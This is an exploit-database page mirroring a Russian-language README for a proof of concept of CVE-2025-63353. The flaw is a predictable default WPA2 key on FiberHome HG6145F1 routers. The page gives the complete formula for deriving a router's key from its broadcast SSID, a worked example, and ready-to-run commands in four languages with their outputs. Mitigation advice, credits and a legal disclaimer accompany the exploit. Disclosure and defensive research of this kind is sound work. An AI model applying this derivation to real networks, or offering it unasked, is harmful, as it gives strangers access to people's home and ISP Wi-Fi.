Sploitus

Exploit for CVE-2025-63353

kitploit · 2026-08-30

Exploit Code

MARKDOWN119 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ZVCKSTER-CVE-2025-63353
# CVE-2025-63353 PoC - Предсказуемый Wi-Fi PSK по умолчанию FiberHome HG6145F1

![CVE](https://img.shields.io/badge/CVE-2025--63353-red.svg) ![CVSS](https://img.shields.io/badge/CVSS-9.8_Critical-red.svg) ![CWE](https://img.shields.io/badge/CWE-284-orange.svg) ![CI](https://github.com/Zvckster/CVE-2025-63353/actions/workflows/test.yml/badge.svg) ![License](https://img.shields.io/badge/License-MIT-blue.svg)

> Образовательный исследовательский набор и мультиязычный PoC для **CVE-2025-63353** — критической уязвимости предсказуемого PSK по умолчанию, затрагивающей устройства GPON ONT FiberHome HG6145F1 RP4423.

## Сводка

Заводской Wi-Fi pre-shared key на затронутых устройствах FiberHome HG6145F1 является детерминированной функцией транслируемого SSID. Злоумышленник, наблюдающий кадр-маяк от уязвимого устройства, может вычислить WPA2 PSK за постоянное время без перехваченного handshake, без словаря, без GPU и без взаимодействия с клиентом.

Для устройства, транслирующего SSID `fh_<hex_a>`, PSK по умолчанию вычисляется так:

root@kitploit:~
    
    
    PSK = "wlan" + hex(0xFFFFFF XOR hex_a)
    

**Пример:** `fh_a1f9d1` → `wlan5e062e`

Эффективное пространство ключей для одного устройства равно **1**. Пространство ключей для всей совокупности развертываний HG6145F1 составляет не более **2²⁴ ≈ 16,7 миллиона** пар (SSID, PSK), и поскольку SSID транслируется, отображение SSID→PSK является взаимно однозначным.

## Благодарности

Эта работа полностью основана на оригинальном исследовании и публичном раскрытии уязвимости **Hani Anis Bouzid** :

  * **Оригинальное раскрытие:** статья на Medium
  * **Оригинальный PoC:** github.com/hanianis/CVE-2025-63353
  * **Запись CVE:** CVE-2025-63353



Вся заслуга в обнаружении уязвимости и первичном публичном раскрытии принадлежит Hani Anis Bouzid. Этот репозиторий расширяет оригинальное раскрытие мультиязычными реализациями PoC и подобранным комплектом технической документации.

## Содержимое репозитория

root@kitploit:~
    
    
    .
    ├── README.md
    ├── LICENSE
    ├── docs/
    │   ├── vulnerability.md          Technical analysis of the algorithm
    │   ├── timeline.md               Disclosure chronology and vendor response
    │   ├── affected-deployments.md   Device specifications and known deployments
    │   ├── related-research.md       Lineage of predictable-PSK vulnerabilities
    │   ├── references.md             Curated bibliography
    │   └── mitigation.md             Guidance for users, ISPs, and vendors
    └── poc/
        ├── python/      pure-Python implementation, no dependencies
        ├── go/          standalone Go binary
        ├── javascript/  browser-friendly JS / Node.js
        └── c/           portable single-file ANSI C (compiles anywhere)
    

## Быстрый старт

root@kitploit:~
    
    
    # Python
    python3 poc/python/fh-poc.py fh_a1f9d1
    # wlan5e062e
    
    # Go
    cd poc/go && go run fh-poc.go fh_a1f9d1
    # wlan5e062e
    
    # JavaScript (Node)
    node poc/javascript/fh-poc.js fh_a1f9d1
    # wlan5e062e
    
    # C
    cc poc/c/fh-poc.c -o fh-poc && ./fh-poc fh_a1f9d1
    # wlan5e062e
    

Все четыре реализации написаны независимо, не имеют зависимостей и выдают одинаковый результат. Используйте ту, которая соответствует вашему окружению.

## Затронутые устройства

Поле| Значение  
---|---  
Производитель| FiberHome (Wuhan FiberHome International Technologies)  
Модель| HG6145F1  
  
В настоящее время уязвимость раскрыта только для прошивки HG6145F1 RP4423. Проверка на более широком семействе моделей HG6145 / HG6243 / HG6821 остаётся открытым исследовательским вопросом. См. docs/affected-deployments.md.

## Смягчение

**Для конечных пользователей HG6145F1:**

  1. Немедленно смените Wi-Fi PSK по умолчанию на случайно сгенерированную парольную фразу длиной 16+ символов.
  2. Отключите WPS.
  3. Если ваш интернет-провайдер управляет обновлениями прошивки, узнайте, доступна ли исправленная прошивка.



Рекомендации для интернет-провайдеров и вендоров см. в docs/mitigation.md.

## Отказ от ответственности

Этот репозиторий опубликован **только в образовательных целях и для исследований в области защитной безопасности**. Описанная здесь уязвимость публично раскрыта под идентификатором CVE-2025-63353 и получила критический уровень опасности от CISA-ADP.

Использование кода из этого репозитория против сетей, которые вам не принадлежат или на тестирование которых у вас нет явного письменного разрешения, **противозаконно** в большинстве юрисдикций, включая марокканский Закон 07-03 о киберпреступности, европейские правовые акты о компьютерных злоупотреблениях, американский Закон о компьютерном мошенничестве и злоупотреблениях (Computer Fraud and Abuse Act) и аналогичное законодательство в других странах. Авторы не несут ответственности за неавторизованное использование данного материала.

## Ссылки

Полная библиография первоисточников, связанных уязвимостей и академической литературы поддерживается в docs/references.md.

## Вклад

Приветствуются проверенные результаты тестирования дополнительных моделей FiberHome, версий прошивок или вариантов, кастомизированных интернет-провайдерами, через pull request в `docs/affected-deployments.md`. Пожалуйста, указывайте версию прошивки, префикс SSID на этикетке устройства и метод проверки.

## Автор

**Ayman Wadi** — инженер по безопасности